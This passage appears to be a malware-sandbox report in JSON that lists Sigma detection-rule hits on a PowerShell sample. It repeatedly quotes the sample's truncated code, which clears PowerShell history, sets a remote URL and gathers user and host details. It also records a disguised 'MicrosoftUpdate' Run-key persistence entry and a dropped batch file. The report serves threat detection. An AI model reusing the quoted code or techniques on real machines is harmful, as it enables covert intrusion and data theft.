"ScriptBlockText": "Remove-Item (Get-PSReadLineOption).HistorySavePath -Force\r\nSet-PSReadLineOption -HistorySaveStyle SaveNothing\r\n\r\n$url = \"https://maskasd.com/8555575039\"\r\n$uid = -join ((48..57) + (65..90) + (97..122) | Get-Random -Count 16 | ForEach-Object { [char]$_ })\r\n$os = Get-CimInstance Win32_OperatingSystem\r\n$username = $env:USERNAME\r\n$hostname = $env:COMPUTERNAME\r\n$timezone = \"UTC \" + $((Get-TimeZone).BaseUtcOffset.TotalHours) + \" hours\"\r\n$bootTime = [int64][DateTimeOffset]::new([DateTime]::SpecifyKind($ [TRUNCATED]",
"MessageTotal": "1",
"ScriptBlockId": "4aaedea9-9b4a-4da3-9ce8-a45b79c701c0",
"Path": "",
"EventID": "4104",
"MessageNumber": "1"
}
},
{
"values": {
"ScriptBlockText": "Remove-Item (Get-PSReadLineOption).HistorySavePath -Force\r\nSet-PSReadLineOption -HistorySaveStyle SaveNothing\r\n\r\n$url = \"https://maskasd.com/8555575039\"\r\n$uid = -join ((48..57) + (65..90) + (97..122) | Get-Random -Count 16 | ForEach-Object { [char]$_ })\r\n$os = Get-CimInstance Win32_OperatingSystem\r\n$username = $env:USERNAME\r\n$hostname = $env:COMPUTERNAME\r\n$timezone = \"UTC \" + $((Get-TimeZone).BaseUtcOffset.TotalHours) + \" hours\"\r\n$bootTime = [int64][DateTimeOffset]::new([DateTime]::SpecifyKind($ [TRUNCATED]",
"Path": "",
"ScriptBlockId": "7cc67d2e-28e7-4afa-8a49-3d46b9b76bed",
"MessageTotal": "1",
"EventID": "4104",
"MessageNumber": "1"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "75df0b220ddaf477070a84227ba8e5430f5d4bbcfdfe1ad41ca6da62894c03ed",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Clear PowerShell History - PowerShell",
"rule_description": "Detects keywords that could indicate clearing PowerShell history",
"rule_author": "Ilyas Ochkov, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community",
"match_context": [
{
"values": {
"ScriptBlockText": "Remove-Item (Get-PSReadLineOption).HistorySavePath -Force\r\nSet-PSReadLineOption -HistorySaveStyle SaveNothing\r\n\r\n$url = \"https://maskasd.com/8555575039\"\r\n$uid = -join ((48..57) + (65..90) + (97..122) | Get-Random -Count 16 | ForEach-Object { [char]$_ })\r\n$os = Get-CimInstance Win32_OperatingSystem\r\n$username = $env:USERNAME\r\n$hostname = $env:COMPUTERNAME\r\n$timezone = \"UTC \" + $((Get-TimeZone).BaseUtcOffset.TotalHours) + \" hours\"\r\n$bootTime = [int64][DateTimeOffset]::new([DateTime]::SpecifyKind($ [TRUNCATED]",
"Path": "",
"ScriptBlockId": "bfa2fbac-303b-41c5-9bad-23d189967fe1",
"MessageTotal": "1",
"MessageNumber": "1",
"EventID": "4104"
}
},
{
"values": {
"ScriptBlockText": "Remove-Item (Get-PSReadLineOption).HistorySavePath -Force\r\nSet-PSReadLineOption -HistorySaveStyle SaveNothing\r\n\r\n$url = \"https://maskasd.com/8555575039\"\r\n$uid = -join ((48..57) + (65..90) + (97..122) | Get-Random -Count 16 | ForEach-Object { [char]$_ })\r\n$os = Get-CimInstance Win32_OperatingSystem\r\n$username = $env:USERNAME\r\n$hostname = $env:COMPUTERNAME\r\n$timezone = \"UTC \" + $((Get-TimeZone).BaseUtcOffset.TotalHours) + \" hours\"\r\n$bootTime = [int64][DateTimeOffset]::new([DateTime]::SpecifyKind($ [TRUNCATED]",
"Path": "",
"ScriptBlockId": "4aaedea9-9b4a-4da3-9ce8-a45b79c701c0",
"MessageTotal": "1",
"MessageNumber": "1",
"EventID": "4104"
}
},
{
"values": {
"ScriptBlockText": "Remove-Item (Get-PSReadLineOption).HistorySavePath -Force\r\nSet-PSReadLineOption -HistorySaveStyle SaveNothing\r\n\r\n$url = \"https://maskasd.com/8555575039\"\r\n$uid = -join ((48..57) + (65..90) + (97..122) | Get-Random -Count 16 | ForEach-Object { [char]$_ })\r\n$os = Get-CimInstance Win32_OperatingSystem\r\n$username = $env:USERNAME\r\n$hostname = $env:COMPUTERNAME\r\n$timezone = \"UTC \" + $((Get-TimeZone).BaseUtcOffset.TotalHours) + \" hours\"\r\n$bootTime = [int64][DateTimeOffset]::new([DateTime]::SpecifyKind($ [TRUNCATED]",
"Path": "",
"ScriptBlockId": "7cc67d2e-28e7-4afa-8a49-3d46b9b76bed",
"MessageTotal": "1",
"EventID": "4104",
"MessageNumber": "1"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "8b5db9da5732dc549b0e8b56fe5933d7c95ed760f3ac20568ab95347ef8c5bcc",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "CurrentVersion Autorun Keys Modification",
"rule_description": "Detects modification of autostart extensibility point (ASEP) in registry.",
"rule_author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)",
"match_context": [
{
"values": {
"RuleName": "T1060,RunKey",
"EventID": "13",
"EventType": "SetValue",
"Image": "c:\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe",
"Details": "C:\\ProgramData\\system.bat",
"TargetObject": "HKU\\S-1-5-21-4270068108-2931534202-3907561125-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\MicrosoftUpdate"
}
},
{
"values": {
"Details": "C:\\ProgramData\\system.bat",
"EventType": "SetValue",
"Image": "C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe",
"EventID": "13",
"TargetObject": "HKU\\S-1-5-21-4005801669-2598574594-602355426-1001\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\MicrosoftUpdate"
}
},
{
"values": {
"EventID": "13",
"Details": "C:\\ProgramData\\system.bat",
"EventType": "SetValue",
"TargetObject": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\MicrosoftUpdate"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "bda626dd3bfb65bcce23cf31a18f15b58628dc48b2bb5cd9fe5f9ea5f9a3cc8c",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Potential Binary Or Script Dropper Via PowerShell",
"rule_description": "Detects PowerShell creating a binary executable or a script file.",
"rule_author": "frack113, Nasreddine Bencherchali (Nextron Systems)",
"match_context": [
{
"values": {
"Image": "c:\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe",
"TargetFilename": "C:\\ProgramData\\system.bat",
"EventID": "11"
}
},
{
"values": {
"Image": "C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe",
"TargetFilename": "C:\\ProgramData\\system.bat",
"EventID": "11"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "ece68c3b6fda1fe5c7d8707c5dd9099cf564ed0e7e7b480e97278c475f10e5a7",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Powershell Execute Batch Script",
"rule_description": "Adversaries may abuse the Windows command shell for execution.\nThe Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems.\nThe Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands.\nBatch files (ex: .bat or .cmd) also provide the shell with a list of sequential commands to run, as well as normal scripting operations such as conditionals and loops.\nCommon uses of batch files include long or repetitive tasks, or the need to run the same set of commands on multiple system\n",
"rule_author": "frack113",
"match_context": [
{
"values": {
"ScriptBlockText": "Remove-Item (Get-PSReadLineOption).HistorySavePath -Force\r\nSet-PSReadLineOption -HistorySaveStyle SaveNothing\r\n\r\n$url = \"https://maskasd.com/8555575039\"\r\n$uid = -join ((48..57) + (65..90) + (97..122) | Get-Random -Count 16 | ForEach-Object { [char]$_ })\r\n$os = Get-CimInstance Win32_OperatingSystem\r\n$username = $env:USERNAME\r\n$hostname = $env:COMPUTERNAME\r\n$timezone = \"UTC \" + $((Get-TimeZone).BaseUtcOffset.TotalHours) + \" hours\"\r\n$bootTime = [int64][DateTimeOffset]::new([DateTime]::SpecifyKind($ [TRUNCATED]",
"MessageTotal": "1",
"ScriptBlockId": "bfa2fbac-303b-41c5-9bad-23d189967fe1",
"Path": "",
"EventID": "4104",
"MessageNumber": "1"
}
},
{
"values": {
"ScriptBlockText": "Remove-Item (Get-PSReadLineOption).HistorySavePath -Force\r\nSet-PSReadLineOption -HistorySaveStyle SaveNothing\r\n\r\n$url = \"https://maskasd.com/8555575039\"\r\n$uid = -join ((48..57) + (65..90) + (97..122) | Get-Random -Count 16 | ForEach-Object { [char]$_ })\r\n$os = Get-CimInstance Win32_OperatingSystem\r\n$username = $env:USERNAME\r\n$hostname = $env:COMPUTERNAME\r\n$timezone = \"UTC \" + $((Get-TimeZone).BaseUtcOffset.TotalHours) + \" hours\"\r\n$bootTime = [int64][DateTimeOffset]::new([DateTime]::SpecifyKind($ [TRUNCATED]",
"Path": "",
"ScriptBlockId": "4aaedea9-9b4a-4da3-9ce8-a45b79c701c0",
"MessageTotal": "1",
"MessageNumber": "1",
"EventID": "4104"
}
},
{
"values": {
"ScriptBlockText": "Remove-Item (Get-PSReadLineOption).HistorySavePath -Force\r\nSet-PSReadLineOption -HistorySaveStyle SaveNothing\r\n\r\n$url = \"https://maskasd.com/8555575039\"\r\n$uid = -join ((48..57) + (65..90) + (97..122) | Get-Random -Count 16 | ForEach-Object { [char]$_ })\r\n$os = Get-CimInstance Win32_OperatingSystem\r\n$username = $env:USERNAME\r\n$hostname = $env:COMPUTERNAME\r\n$timezone = \"UTC \" + $((Get-TimeZone).BaseUtcOffset.TotalHours) + \" hours\"\r\n$bootTime = [int64][DateTimeOffset]::new([DateTime]::SpecifyKind($ [TRUNCATED]",
"MessageTotal": "1",
"ScriptBlockId": "7cc67d2e-28e7-4afa-8a49-3d46b9b76bed",
"Path": "",
"EventID": "4104",
"MessageNumber": "1"
}
}
]
},
{
"rule_level": "low",
"rule_id": "80e1441e8251586c742da610b4bceb4d94fbe79f4e8b64b9745b6a11da90d7c1",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "PowerShell Script With File Upload Capabilities",
"rule_description": "Detects PowerShell scripts leveraging the \"Invoke-WebRequest\" cmdlet to send data via either \"PUT\" or \"POST\" method.",
"rule_author": "frack113",
"match_context": [
{
"values": {
"ScriptBlockText": "Remove-Item (Get-PSReadLineOption).HistorySavePath -Force\r\nSet-PSReadLineOption -HistorySaveStyle SaveNothing\r\n\r\n$url = \"https://maskasd.com/8555575039\"\r\n$uid = -join ((48..57) + (65..90) + (97..122) | Get-Random -Count 16 | ForEach-Object { [char]$_ })\r\n$os = Get-CimInstance Win32_OperatingSystem\r\n$username = $env:USERNAME\r\n$hostname = $env:COMPUTERNAME\r\n$timezone = \"UTC \" + $((Get-TimeZone).BaseUtcOffset.TotalHours) + \" hours\"\r\n$bootTime = [int64][DateTimeOffset]::new([DateTime]::SpecifyKind($ [TRUNCATED]",
"Path": "",
"ScriptBlockId": "bfa2fbac-303b-41c5-9bad-23d189967fe1",
"MessageTotal": "1",
"EventID": "4104",
"MessageNumber": "1"
}
},
{
"values": {
"ScriptBlockText": "Remove-Item (Get-PSReadLineOption).HistorySavePath -Force\r\nSet-PSReadLineOption -HistorySaveStyle SaveNothing\r\n\r\n$url = \"https://maskasd.com/8555575039\"\r\n$uid = -join ((48..57) + (65..90) + (97..122) | Get-Random -Count 16 | ForEach-Object { [char]$_ })\r\n$os = Get-CimInstance Win32_OperatingSystem\r\n$username = $env:USERNAME\r\n$hostname = $env:COMPUTERNAME\r\n$timezone = \"UTC \" + $((Get-TimeZone).BaseUtcOffset.TotalHours) + \" hours\"\r\n$bootTime = [int64][DateTimeOffset]::new([DateTime]::SpecifyKind($ [TRUNCATED]",
"Path": "",
"ScriptBlockId": "4aaedea9-9b4a-4da3-9ce8-a45b79c701c0",
"MessageTotal": "1",
"MessageNumber": "1",
"EventID": "4104"
}
},
{
"values": {
"ScriptBlockText": "Remove-Item (Get-PSReadLineOption).HistorySavePath -Force\r\nSet-PSReadLineOption -HistorySaveStyle SaveNothing\r\n\r\n$url = \"https://maskasd.com/8555575039\"\r\n$uid = -join ((48..57) + (65..90) + (97..122) | Get-Random -Count 16 | ForEach-Object { [char]$_ })\r\n$os = Get-CimInstance Win32_OperatingSystem\r\n$username = $env:USERNAME\r\n$hostname = $env:COMPUTERNAME\r\n$timezone = \"UTC \" + $((Get-TimeZone).BaseUtcOffset.TotalHours) + \" hours\"\r\n$bootTime = [int64][DateTimeOffset]::new([DateTime]::SpecifyKind($ [TRUNCATED]",
"MessageTotal": "1",
"ScriptBlockId": "7cc67d2e-28e7-4afa-8a49-3d46b9b76bed",
"Path": "",
"EventID": "4104",
"MessageNumber": "1"
}
}
]
},
{
"rule_level": "low",
"rule_id": "c085cde9af85b182e783b8d7b42d66d3d0efe08696b4fe7946da3d5d1a2cd51e",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Potential PowerShell Obfuscation Using Alias Cmdlets",
"rule_description": "Detects Set-Alias or New-Alias cmdlet usage. Which can be use as a mean to obfuscate PowerShell scripts",
"rule_author": "frack113",
"match_context": [
{
"values": {
"ScriptBlockText": "Set-Alias -Name ncim -Value New-CimInstance -Option ReadOnly, AllScope -ErrorAction SilentlyContinue",
"Path": "",
"ScriptBlockId": "f4b3f7db-d120-408e-bced-000fae879427",
"MessageTotal": "1",
"EventID": "4104",
"MessageNumber": "1"
}
}
]
},
{
"rule_level": "low",
"rule_id": "c0ad3fd3010dc41b8f54cd4f911b4bf081d2d195b0e7548cdc60ebcee9250ad3",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Suspicious PowerShell Get Current User",
"rule_description": "Detects the use of PowerShell to identify the current logged user.",
"rule_author": "frack113",
"match_context": [
{
"values": {
"ScriptBlockText": "Remove-Item (Get-PSReadLineOption).HistorySavePath -Force\r\nSet-PSReadLineOption -HistorySaveStyle SaveNothing\r\n\r\n$url = \"https://maskasd.com/8555575039\"\r\n$uid = -join ((48..57) + (65..90) + (97..122) | Get-Random -Count 16 | ForEach-Object { [char]$_ })\r\n$os = Get-CimInstance Win32_OperatingSystem\r\n$username = $env:USERNAME\r\n$hostname = $env:COMPUTERNAME\r\n$timezone = \"UTC \" + $((Get-TimeZone).BaseUtcOffset.TotalHours) + \" hours\"\r\n$bootTime = [int64][DateTimeOffset]::new([DateTime]::SpecifyKind($ [TRUNCATED]",
"MessageTotal": "1",
"ScriptBlockId": "bfa2fbac-303b-41c5-9bad-23d189967fe1",
"Path": "",
"EventID": "4104",
"MessageNumber": "1"
}
},
{
"values": {
"ScriptBlockText": "Remove-Item (Get-PSReadLineOption).HistorySavePath -Force\r\nSet-PSReadLineOption -HistorySaveStyle SaveNothing\r\n\r\n$url = \"https://maskasd.com/8555575039\"\r\n$uid = -join ((48..57) + (65..90) + (97..122) | Get-Random -Count 16 | ForEach-Object { [char]$_ })\r\n$os = Get-CimInstance Win32_OperatingSystem\r\n$username = $env:USERNAME\r\n$hostname = $env:COMPUTERNAME\r\n$timezone = \"UTC \" + $((Get-TimeZone).BaseUtcOffset.TotalHours) + \" hours\"\r\n$bootTime = [int64][DateTimeOffset]::new([DateTime]::SpecifyKind($ [TRUNCATED]",
"Path": "",
"ScriptBlockId": "4aaedea9-9b4a-4da3-9ce8-a45b79c701c0",
"MessageTotal": "1",
"MessageNumber": "1",
"EventID": "4104"
}
},
{
"values": {
"ScriptBlockText": "Remove-Item (Get-PSReadLineOption).HistorySavePath -Force\r\nSet-PSReadLineOption -HistorySaveStyle SaveNothing\r\n\r\n$url = \"https://maskasd.com/8555575039\"\r\n$uid = -join ((48..57) + (65..90) + (97..122) | Get-Random -Count 16 | ForEach-Object { [char]$_ })\r\n$os = Get-CimInstance Win32_OperatingSystem\r\n$username = $env:USERNAME\r\n$hostname = $env:COMPUTERNAME\r\n$timezone = \"UTC \" + $((Get-TimeZone).BaseUtcOffset.TotalHours) + \" hours\"\r\n$bootTime = [int64][DateTimeOffset]::new([DateTime]::SpecifyKind($ [TRUNCATED]",
"MessageTotal": "1",
"ScriptBlockId": "7cc67d2e-28e7-4afa-8a49-3d46b9b76bed",
"Path": "",
"EventID": "4104",
"MessageNumber": "1"
}
}
]
}
],
"ssdeep": "384:awUjo2srpPAHkK8w/GQREpnsCzNzz+Dq6husy:awwksDApscFsq6husy",
"type_tags": [
"source",
"powershell",
"ps",
"ps1"
],
"total_votes": {
"harmless": 0,
"malicious": 0
},
"last_analysis_date": 1781830002,
"sha256": "50eae63d3e24be9ca8803f4b5a0408aef97ee3fab7af018d8c2dde7c359edd65",
"size": 12742
}
}
}